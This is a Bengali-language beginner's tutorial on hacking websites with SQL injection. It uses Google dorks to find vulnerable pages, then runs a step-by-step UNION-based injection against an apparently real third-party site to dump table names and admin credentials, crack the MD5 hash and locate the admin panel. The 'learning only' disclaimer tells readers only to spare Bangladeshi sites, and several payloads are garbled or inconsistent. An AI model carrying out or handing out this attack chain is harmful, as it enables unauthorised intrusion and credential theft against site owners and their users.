আসসালামু আলাইকুম কেমন আছেন সবাই? আসা করছি ভালই আছেন। আজকে আমি আপনাদের সাথে শেয়ার করব sql দিয়ে কিভাবে ওয়েব হ্যাক করা যায়। যা একদম নতুন দের জন্য আর কোন ভুল ত্রুটি থাকলে ধরিয়ে দিবেন।
Sql এর জন্য আমাদের সবথেকে বেস্ট পার্টনার হল google.com.
তাহলে চলুন দেখেনেই কিভাবে google.com থেকে sql injection সাইট খুজব।
তাহলে চলুন দেখে নেই sql এর স্টেপ গুলিঃ
১। sql injectable site খুজে বের করা
২. ডাটাবেজ কলাম বের করা।।
৩. ভার্নাবল কলাম বের করা।
৪.সাইট এর ভার্সন বের করা।
৫. টেবিল খুজে বের করা ।
৬.ভার্নাবল কলাম বের করা ।
৭. সবশেষে এডমিন প্যানেল।
তাহলে চলুন শুরু করি…………..
১। sql injectable siteঃ
প্রথমে আমরা google.com এ যাব…
তারপর নিচের ডর্ক গুলো কপি করব এবং Enter দিব। এরকম হাজার ও ডর্ক আছে আমি শুধু নিচে ২ টা দিলাম।
1. inurl:news.php?id=
2. inurl:index.php?id=
তারপর আপনি যে সাইট রেজাল্ট পাবেন । সেগুলো নিউট্যাব এ অপেন করবেন।
তারপর লিংক এর শেষে (‘) singlae quatation দিবেন। তার পর যদি নিচের ছবির মত error আসে তাহলে বুঝবেন যে, এই সাইট sql injectable.
http://www.calidus.ro/en/news.php?id=99‘
ছবিঃ
২. ডাটাবেজ ঃ ডাটাবেজ বের করার কমান্ড হলঃ order by
তাহলে লিংটি দাড়ায়ঃ http://www.calidus.ro/en/news.php?id=99 order by 1 [no error]
http://www.calidus.ro/en/news.php?id=99 order by 2 [no error]
http://www.calidus.ro/en/news.php?id=99 order by 3 [no error]
http://www.calidus.ro/en/news.php?id=99 order by 4 [no error]
http://www.calidus.ro/en/news.php?id=99 order by 5 [error]
তার মানে এই সাইটের ডাটাবেজ এর কলাম হল ৫ টি।
৩. ভার্নাবল কলাম ঃ ভার্নাবল কলাম বের করার কমান্ড
হলঃ union all select 1,2,3,4,5–
তাহলে লিংক দাড়ালঃ http://www.calidus.ro/en/news.php?id=-99 union all select 1,2,3,4–
ছবিঃ
এই সাইটের ভার্নাবল কলাম হল ২,৪ । আমরা যে কোন একটা নিয়ে কাজ করতে পারব। আমি ২ নাম্বার কলাম নিয়ে কাজ করব।
2nd part:
৪.সাইট এর ভার্সন ঃ সাইট এর ভার্সন বের করতে হবে নিচের কমান্ড দিয়েঃ
(@@version)
তাহলে লিংক দাড়ালঃ http://www.calidus.ro/en/news.php?id=-99 union all select 1,@@version,3,4–
ছবিঃ
এই সাইট এর ভার্সন হল 5.6.24-log .
[বি.দ্রঃ ৫ এর নিচের ভার্সন এর সাইট গুলো বাদ দিয়ে কাজ করবেন ।]
৫. টেবিলঃ টেবিল এর কমান্ড হলঃ এক্ষেত্রে আমরা ভার্সন এর বদলে group_concat(table_name) দিব এবং শেষ কলামের পর from information_schema.tables where table_schema=database()– দিব।
তাহলে লিংক দাড়ালঃ www.calidus.ro/en/news.php?id=-99 union all select 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database()–
ছবিঃ
এগুলোর হল টেবিল এর নাম । এখন এখান থেকে আমাদের কে এডমিন টেবিল খুজে বের করতে হবে। এখানে এডমিন টেবিল হল users .
৬. কলাম ঃ কলাম এর কমান্ড হলঃ group_concat(column_name) from information_schema.columns where table_name=mysqlchar–
তাহলে লিংক দাড়ালঃ www.calidus.ro/en/news.php?id=-99 union all select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_name=mysqlchar–
এখন আমাদের কে MysqlChar() Table name খুজে বের করার জন্য addone ইন্সটল করতে হবে।
এই লিং থেকে ইনস্টল করুনঃ
https://addons.mozilla.org/en-US/firefox/addon/3899
এখন আমরা যে এডমিন টেবিল পেয়েছি সেটাকে CHR এ রুপান্তর করতে হবে। আমাদের এডমিন টেবিল ছিল users
ছবিঃ
তাহলে লিংক দাড়ালঃ
user_id,user_type,user_regdate,username,user_password etc এগুলো হল কলাম নেইম।
এডমিন পাস ঃ এর কমান্ড হল ঃ group_concat(column_name) এর বদলে
group_concat(columnname,0x3a,anothercolumnname) এবং
from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115) — এর পরিবর্তে from table_name”
তাহলে লিংক দাড়ালঃ http://www.calidus.ro/en/news.php?id=-99 group_concat(username,0x3a,user_password) from user–
ছবিঃ
এটা হল এডমিন নাম এবনং পাস । এটা কে md5 hass decode করতে হবে তাহলে ঃ
এডমিন নাম হলঃ admin এবং পাস হল root
এডমিন ফাইন্ডারঃ
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082
না বুজলে ইউটিউব এর ভিডিও লিঙ্ক : https://www.youtube.com/watch?v=fk3IpqfVnfw
[বি.দ্রঃ এটা শুধু শিখার জন্য। এই লেখা অনুসরন করে যদি কেও ক্ষতির সম্মুখিন হন তাহলে এর জন্য আমি “D@rk Di@mond ” দায়ি নই। আর কেও বাংলাদেশি সাইট হ্যাক করবেন না। ধন্যবাদ ভাল থাকবেন।খোদা হাফেজ।